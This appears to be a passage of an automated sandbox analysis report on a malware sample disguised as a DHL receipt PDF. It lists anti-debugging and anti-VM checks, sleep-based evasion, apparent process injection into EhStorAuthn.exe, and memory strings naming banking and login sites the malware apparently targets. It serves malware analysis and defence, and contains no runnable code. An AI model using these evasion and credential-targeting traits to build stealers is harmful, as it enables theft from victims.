File source: Process Memory Space: DHL AWB Receipt_pdf.bat.exe PID: 8484, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF84F7AD324
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF84F7AD7E4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF84F7AD944
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF84F7AD504
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF84F7AD544
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF84F7AD1E4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF84F7B0154
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API/Special instruction interceptor: Address: 7FF84F7ADA44

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: 28E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: 85E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: 95E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: 97D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: A7D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Code function: 4_2_0142096E rdtsc

4_2_0142096E

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5233	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2900	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Window / User API: threadDelayed 3885	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Window / User API: threadDelayed 6089	Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	API coverage: 2.8 %

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe TID: 8504	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8720	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8620	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 9100	Thread sleep count: 3885 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 9100	Thread sleep time: -7770000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 9100	Thread sleep count: 6089 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 9100	Thread sleep time: -12178000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe TID: 9140	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe TID: 9140	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe TID: 9140	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe TID: 9140	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe TID: 9140	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\EhStorAuthn.exe

Code function: 6_2_02CCC720 FindFirstFileW,FindNextFileW,FindClose,

6_2_02CCC720

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3759756821.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: 46G3-7765.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 46G3-7765.6.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 46G3-7765.6.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rokers - EU WestVMware20,11696428655n
Source: 46G3-7765.6.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 46G3-7765.6.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CDYNVMware20,11696428655z
Source: 46G3-7765.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1304461507.0000000000925000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 46G3-7765.6.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kers - non-EU EuropeVMware20,11696428655
Source: 46G3-7765.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 46G3-7765.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n.utiitsl.comVMware20,11696428655h
Source: 46G3-7765.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11
Source: 46G3-7765.6.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: saction PasswordVMware20?
Source: 46G3-7765.6.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 46G3-7765.6.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 46G3-7765.6.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 46G3-7765.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: firefox.exe, 0000000B.00000002.1813541844.0000016E8024E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 46G3-7765.6.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 46G3-7765.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 46G3-7765.6.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .comVMware20,11696428655x
Source: 46G3-7765.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ok.office365.comVMware20,11696428655t
Source: 46G3-7765.6.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 46G3-7765.6.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1304461507.0000000000925000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ivebrokers.comVMware20,1
Source: 46G3-7765.6.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 46G3-7765.6.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 46G3-7765.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 46G3-7765.6.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 46G3-7765.6.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 46G3-7765.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 46G3-7765.6.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s.office.comVMware20,11696428655o
Source: EhStorAuthn.exe, 00000006.00000002.3759000759.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*(
Source: 46G3-7765.6.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 46G3-7765.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: EhStorAuthn.exe, 00000006.00000002.3763094461.0000000007E05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rtal.azure.comVMware20,11696428655
Source: 46G3-7765.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Code function: 4_2_0142096E rdtsc

4_2_0142096E

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Code function: 4_2_004179B3 LdrLoadDll,

4_2_004179B3

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01474144 mov eax, dword ptr fs:[00000030h]	4_2_01474144
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01474144 mov eax, dword ptr fs:[00000030h]	4_2_01474144
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01474144 mov ecx, dword ptr fs:[00000030h]	4_2_01474144
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01474144 mov eax, dword ptr fs:[00000030h]	4_2_01474144
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01474144 mov eax, dword ptr fs:[00000030h]	4_2_01474144
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01478158 mov eax, dword ptr fs:[00000030h]	4_2_01478158
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E10E mov eax, dword ptr fs:[00000030h]	4_2_0148E10E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E10E mov ecx, dword ptr fs:[00000030h]	4_2_0148E10E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E10E mov eax, dword ptr fs:[00000030h]	4_2_0148E10E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E10E mov eax, dword ptr fs:[00000030h]	4_2_0148E10E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E10E mov ecx, dword ptr fs:[00000030h]	4_2_0148E10E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E10E mov eax, dword ptr fs:[00000030h]	4_2_0148E10E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E10E mov eax, dword ptr fs:[00000030h]	4_2_0148E10E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E10E mov ecx, dword ptr fs:[00000030h]	4_2_0148E10E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E10E mov eax, dword ptr fs:[00000030h]	4_2_0148E10E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E10E mov ecx, dword ptr fs:[00000030h]	4_2_0148E10E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148A118 mov ecx, dword ptr fs:[00000030h]	4_2_0148A118
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148A118 mov eax, dword ptr fs:[00000030h]	4_2_0148A118
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148A118 mov eax, dword ptr fs:[00000030h]	4_2_0148A118
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148A118 mov eax, dword ptr fs:[00000030h]	4_2_0148A118
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A0115 mov eax, dword ptr fs:[00000030h]	4_2_014A0115
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01410124 mov eax, dword ptr fs:[00000030h]	4_2_01410124
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E6154 mov eax, dword ptr fs:[00000030h]	4_2_013E6154
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E6154 mov eax, dword ptr fs:[00000030h]	4_2_013E6154
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DC156 mov eax, dword ptr fs:[00000030h]	4_2_013DC156
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A61C3 mov eax, dword ptr fs:[00000030h]	4_2_014A61C3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A61C3 mov eax, dword ptr fs:[00000030h]	4_2_014A61C3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0145E1D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0145E1D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E1D0 mov ecx, dword ptr fs:[00000030h]	4_2_0145E1D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0145E1D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0145E1D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DA197 mov eax, dword ptr fs:[00000030h]	4_2_013DA197
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DA197 mov eax, dword ptr fs:[00000030h]	4_2_013DA197
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DA197 mov eax, dword ptr fs:[00000030h]	4_2_013DA197
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B61E5 mov eax, dword ptr fs:[00000030h]	4_2_014B61E5
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014101F8 mov eax, dword ptr fs:[00000030h]	4_2_014101F8
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0149C188 mov eax, dword ptr fs:[00000030h]	4_2_0149C188
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0149C188 mov eax, dword ptr fs:[00000030h]	4_2_0149C188
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01420185 mov eax, dword ptr fs:[00000030h]	4_2_01420185
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01484180 mov eax, dword ptr fs:[00000030h]	4_2_01484180
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01484180 mov eax, dword ptr fs:[00000030h]	4_2_01484180
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146019F mov eax, dword ptr fs:[00000030h]	4_2_0146019F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146019F mov eax, dword ptr fs:[00000030h]	4_2_0146019F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146019F mov eax, dword ptr fs:[00000030h]	4_2_0146019F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146019F mov eax, dword ptr fs:[00000030h]	4_2_0146019F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01466050 mov eax, dword ptr fs:[00000030h]	4_2_01466050
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DA020 mov eax, dword ptr fs:[00000030h]	4_2_013DA020
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DC020 mov eax, dword ptr fs:[00000030h]	4_2_013DC020
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FE016 mov eax, dword ptr fs:[00000030h]	4_2_013FE016
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FE016 mov eax, dword ptr fs:[00000030h]	4_2_013FE016
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FE016 mov eax, dword ptr fs:[00000030h]	4_2_013FE016
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FE016 mov eax, dword ptr fs:[00000030h]	4_2_013FE016
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140C073 mov eax, dword ptr fs:[00000030h]	4_2_0140C073
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01464000 mov ecx, dword ptr fs:[00000030h]	4_2_01464000
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01482000 mov eax, dword ptr fs:[00000030h]	4_2_01482000
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01482000 mov eax, dword ptr fs:[00000030h]	4_2_01482000
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01482000 mov eax, dword ptr fs:[00000030h]	4_2_01482000
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01482000 mov eax, dword ptr fs:[00000030h]	4_2_01482000
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01482000 mov eax, dword ptr fs:[00000030h]	4_2_01482000
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01482000 mov eax, dword ptr fs:[00000030h]	4_2_01482000
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01482000 mov eax, dword ptr fs:[00000030h]	4_2_01482000
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01482000 mov eax, dword ptr fs:[00000030h]	4_2_01482000
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E2050 mov eax, dword ptr fs:[00000030h]	4_2_013E2050
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01476030 mov eax, dword ptr fs:[00000030h]	4_2_01476030
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014620DE mov eax, dword ptr fs:[00000030h]	4_2_014620DE
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014660E0 mov eax, dword ptr fs:[00000030h]	4_2_014660E0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014220F0 mov ecx, dword ptr fs:[00000030h]	4_2_014220F0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E208A mov eax, dword ptr fs:[00000030h]	4_2_013E208A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DC0F0 mov eax, dword ptr fs:[00000030h]	4_2_013DC0F0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E80E9 mov eax, dword ptr fs:[00000030h]	4_2_013E80E9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DA0E3 mov ecx, dword ptr fs:[00000030h]	4_2_013DA0E3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014780A8 mov eax, dword ptr fs:[00000030h]	4_2_014780A8
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A60B8 mov eax, dword ptr fs:[00000030h]	4_2_014A60B8
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A60B8 mov ecx, dword ptr fs:[00000030h]	4_2_014A60B8
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01462349 mov eax, dword ptr fs:[00000030h]	4_2_01462349
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AA352 mov eax, dword ptr fs:[00000030h]	4_2_014AA352
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01488350 mov ecx, dword ptr fs:[00000030h]	4_2_01488350
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146035C mov eax, dword ptr fs:[00000030h]	4_2_0146035C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146035C mov eax, dword ptr fs:[00000030h]	4_2_0146035C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146035C mov eax, dword ptr fs:[00000030h]	4_2_0146035C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146035C mov ecx, dword ptr fs:[00000030h]	4_2_0146035C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146035C mov eax, dword ptr fs:[00000030h]	4_2_0146035C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146035C mov eax, dword ptr fs:[00000030h]	4_2_0146035C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DC310 mov ecx, dword ptr fs:[00000030h]	4_2_013DC310
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148437C mov eax, dword ptr fs:[00000030h]	4_2_0148437C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141A30B mov eax, dword ptr fs:[00000030h]	4_2_0141A30B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141A30B mov eax, dword ptr fs:[00000030h]	4_2_0141A30B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141A30B mov eax, dword ptr fs:[00000030h]	4_2_0141A30B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01400310 mov ecx, dword ptr fs:[00000030h]	4_2_01400310
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0149C3CD mov eax, dword ptr fs:[00000030h]	4_2_0149C3CD
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014663C0 mov eax, dword ptr fs:[00000030h]	4_2_014663C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E3DB mov eax, dword ptr fs:[00000030h]	4_2_0148E3DB
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E3DB mov eax, dword ptr fs:[00000030h]	4_2_0148E3DB
